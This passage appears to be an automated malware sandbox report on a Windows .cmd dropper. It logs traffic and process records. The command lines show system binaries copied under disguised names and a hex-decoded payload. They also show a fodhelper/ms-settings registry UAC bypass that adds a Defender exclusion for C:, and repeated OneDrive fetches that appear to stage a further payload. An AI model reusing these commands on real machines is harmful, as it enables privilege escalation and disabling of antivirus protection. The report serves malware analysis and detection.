                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:46 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:46 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-bbfgc
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 7DC74BC4099B4137BDDD07BB510C8AD8 Ref B: BN3EDGE0822 Ref C: 2024-09-21T14:23:46Z
                            Date: Sat, 21 Sep 2024 14:23:45 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 26 | Source IP: 192.168.2.8 | Source Port: 53576 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:49 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:49 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928629&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:akbGAkna3Ig=:pYwD/6lNQZtU30CZqFo8jFBg+sacPboYRMtAlr1mIZE=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b6664b3f-2d07-4a50-a0d8-89f6519f0a64&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:49 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:49 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-ql9tz
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 2687890832A0484685CD5F14B3774633 Ref B: BN3EDGE1122 Ref C: 2024-09-21T14:23:49Z
                            Date: Sat, 21 Sep 2024 14:23:49 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 27 | Source IP: 192.168.2.8 | Source Port: 53579 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:52 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:53 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928632&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:tSesBEna3Ig=:YPfUauVjxxZJKoffjSFzUhy7CVLmPb8Je6GvVkU2oWI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=ecae0382-d775-4426-87dd-04f2646ba289&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:52 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:52 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-njql2
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 81FF912CAA324ED8AAE3EE701B5F1838 Ref B: BN3EDGE0621 Ref C: 2024-09-21T14:23:52Z
                            Date: Sat, 21 Sep 2024 14:23:52 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 28 | Source IP: 192.168.2.8 | Source Port: 53582 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:55 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:56 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928636&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:LzSUBkna3Ig=:GeXC0FWT+KvzUs6903LmFIdDcpDwh4Cmq0LmEM4ymvY=:F; domain=.live.com; path=/
                            Set-Cookie: xid=8e8e6e9d-e3b0-44da-b198-2a3bc8b1ffd1&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:55 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:56 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-9slg4
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 15820A459C1F48B793950182DE495663 Ref B: BN3EDGE0712 Ref C: 2024-09-21T14:23:55Z
                            Date: Sat, 21 Sep 2024 14:23:55 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 29 | Source IP: 192.168.2.8 | Source Port: 53585 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:58 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:59 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928639&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:/Vt5CEna3Ig=:Ge8QMeujMI1xE61Uku5b6qe7Jy95ESxN+HX1a2M+PEI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=18b3c5cd-be46-429a-8dce-3296176a7537&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:58 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:59 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-874vg
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 3260C76A838049238407C22B8198D83A Ref B: BN3EDGE0411 Ref C: 2024-09-21T14:23:58Z
                            Date: Sat, 21 Sep 2024 14:23:58 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 30 | Source IP: 192.168.2.8 | Source Port: 53588 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:24:02 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:24:03 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928642&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:4mJyCkna3Ig=:qEL+o/XiYJ3AG3ZlMNFqUtAZLZNjHUWoLlmf+4xNkrs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=7f5c2ff9-b93f-42c8-aa52-983850b6d24c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:44:02 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:24:02 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-8hd77
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: E34948BA6DD945D797C97A50EAD1365B Ref B: BN3EDGE0205 Ref C: 2024-09-21T14:24:02Z
                            Date: Sat, 21 Sep 2024 14:24:01 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 31 | Source IP: 192.168.2.8 | Source Port: 53591 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:24:06 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:24:06 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928646&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:2JnADEna3Ig=:rFnk2wKhmzICTL9YaTzJvjCfI96lGAJgBsoYOh/2EqA=:F; domain=.live.com; path=/
                            Set-Cookie: xid=d51b007a-7fc0-4931-9dd1-b218c1ff911c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:44:06 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:24:06 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-55l6j
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 897761AEB2F548998EAE3186873A0A28 Ref B: BN3EDGE0211 Ref C: 2024-09-21T14:24:06Z
                            Date: Sat, 21 Sep 2024 14:24:05 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 32 | Source IP: 192.168.2.8 | Source Port: 53594 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:24:09 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:24:10 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928650&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:F2HfDkna3Ig=:J12wij6xTUBUe+LI6gar0tlCKiPxnjBkzYGsSojsfYE=:F; domain=.live.com; path=/
                            Set-Cookie: xid=c10eb0e4-0229-454a-981a-7c23d76f14d7&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:44:09 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:24:10 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-fsmjf
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 5F38E9E60F114BE9AF7E2707312322FA Ref B: BN3EDGE0715 Ref C: 2024-09-21T14:24:09Z
                            Date: Sat, 21 Sep 2024 14:24:09 GMT
                            Connection: close
                            Content-Length: 0


                            Target ID:0
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" "
                            Imagebase:0x7ff6f45d0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6ee680000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:4
                            Start time:10:22:05
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:10:22:06
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:10:22:06
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:10:22:06
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:8
                            Start time:10:22:07
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:10:22:07
                            Start date:21/09/2024
                            Path:C:\Users\Public\kn.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
                            Imagebase:0x7ff607f50000
                            File size:1'651'712 bytes
                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            Target ID:10
                            Start time:10:22:07
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:12
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:13
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:14
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:10:22:08
                            Start date:21/09/2024
                            Path:C:\Windows\System32\extrac32.exe
                            Wow64 process (32bit):false
                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                            Imagebase:0x7ff6a72c0000
                            File size:35'328 bytes
                            MD5 hash:41330D97BF17D07CD4308264F3032547
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:10:22:09
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:10:22:09
                            Start date:21/09/2024
                            Path:C:\Users\Public\xkn.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                            Imagebase:0x7ff6bb8e0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:18
                            Start time:10:22:11
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:10:22:11
                            Start date:21/09/2024
                            Path:C:\Users\Public\ger.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                            Imagebase:0x7ff73a390000
                            File size:77'312 bytes
                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            Target ID:20
                            Start time:10:22:12
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:10:22:12
                            Start date:21/09/2024
                            Path:C:\Users\Public\kn.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                            Imagebase:0x7ff607f50000
                            File size:1'651'712 bytes
                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:10:22:13
                            Start date:21/09/2024
                            Path:C:\Windows \System32\per.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\\Windows \\System32\\per.exe"
                            Imagebase:0x7ff739d20000
                            File size:49'664 bytes
                            MD5 hash:85018BE1FD913656BC9FF541F017EACD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 3%, ReversingLabs
                            Has exited:true

                            Target ID:28
                            Start time:10:22:15
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:10:22:15
                            Start date:21/09/2024
                            Path:C:\Windows\System32\taskkill.exe
                            Wow64 process (32bit):false
                            Commandline:taskkill /F /IM SystemSettings.exe
                            Imagebase:0x7ff6d8430000
                            File size:101'376 bytes
                            MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:10:22:15
                            Start date:21/09/2024
                            Path:C:\Windows\System32\SystemSettingsAdminFlows.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
                            Imagebase:0x7ff7863e0000
                            File size:519'080 bytes
                            MD5 hash:5FA3EEF00388ED6344B4C35BA7CAA460
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\Libraries\Ping_c.pif
